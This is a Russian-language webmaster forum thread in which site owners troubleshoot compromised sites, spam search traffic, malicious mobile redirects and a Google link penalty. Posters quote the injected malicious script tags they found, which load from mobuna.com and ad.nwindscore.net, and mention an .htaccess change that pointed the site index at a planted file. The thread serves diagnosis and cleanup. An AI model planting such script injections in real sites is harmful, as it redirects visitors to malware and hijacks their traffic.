проверил сайт айболитом, ничего нет
никаких заражений больше не было, после того, как убрал то, что было
сейчас опять прет траффик по левым фразам - порно и другое
что - никто не знает, что это может быть?
мобильного редиректа нет
обнаружил следующее ранее
в корневую директорию был занесен index.html, полностью повторявший пхпешный аналог темплейта сайта, но в нем был добавлено - <script type="text/javascript" src="http://mobuna.com/js?id=6913"></script>
а в .htaccess был изменена индексная директория с index.php на этот index.html
убил index.html, изменил htaccess - трафик продолжает литься
нужно ждать теперь? или еще что-то смотреть?
поисковых запросов, помимо порно - масса - например - барсуков яков степанович
budhaus.kiev.ua - вот домен---------- Добавлено 22.02.2014 в 11:54 ----------запросы по порно - больше всего порно видео н у и другие
ливинтернет показывает запросы с google.com и google.ru---------- Добавлено 22.02.2014 в 12:30 ----------траффик также с m.odnoklassniki.ru, m.avito.ru, m.vk.com, чего раньше не было
нашел в коде вот такое <script type="text/javascript" src="http://mobuna.com/js?id=6913"></script>
и это делал-нет там сайта в выдаче
можно я Вам скину домен в личку, может Вы глянете?
Сайт на друпале.
вводил фрази и рядом имя домена - нету сайта там в выдаче
Стоит счетчик livinternet - там все это есть
тоже получил в марте сообщение про ненатуральные ссылки
сразу скажу - было около 180 саповских + около 40 со своих сайтов + где-то-как-то не мной оставленных
вначале ничего не делал - смотрел, что будет дальше
просто докупал разбавочные ссылки - тут, здесь, домен и т.п
в сентябре, увидев, что ничего не меняется - решил почистить ссылочное
сначала прошерстил откровенный шлак, хотя, как такового не было, но как говорится - убрал худшее
ответ - говноссылки остались и пример
убрал их + с десяток подобных
убрал их + конкретно прошерстил и удалил все с пр0, низким посещением, малоинформативной инфой
убрал их + конкретно прошерстил и удалил все нетематичные
в итоге за 4 попытки было удалено около 120 ссылок из 180
проверил, и удалил только эти 2 из примера и с 5-й попытки пришло письмо, что ручные сняты
я уже писал неделю назад, как человек боролся с хостерами по поводу этого мобильного редиректа - http://10kilogramm.ru/mobilnyj-redirekt-a-chto-esli-virus-ne-na-sajte.php
после того, как я отправил ссылку на статью своему хостингу, они зашевелились (до этого были отписки, типа яндекс плохой, iframe, у нас Linux, поэтому заражение невозможно и т.п) и бан яндекса исчез
я пытался добиться ответа - нашли ли они дыру, т.к. сообщили, что пересобрали вебсервер, грубо говоря переустановили то, что было - ответили, что не нашли причину редиректа на сервере, разбираются...
прошла неделя и в воскресенье яндекс снова выдал сообщение про редирект - на этот раз
При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:
<script src="//ad.nwindscore.net/ldr.php?194288529"></script>
с помощью которого происходит перенаправление пользователей на следующий вредоносный ресурс: gettouch.biz .
На сайте и в бд ничего нет.
Я опять написал.
Они что-то там опять сделали, но яндекс при перепроверке снова ругается.
Я написал снова. Хостер ответил, что просканировал все сайты на хостинге, нашел несколько зараженных (мой не заражен), удалил заражение и заблокировал сайты.
Я опять подал на пересмотр яндексу. Продолжение следует. сервис проверки на редирект http://secu.ru/online-services/redirect показывает его отстутствие.
Но я думаю, что еще не вечер.
такое же появилось в фаерфоксе - удалил отключением в опции Дополнения прямо в браузере, которое эти окна грузило
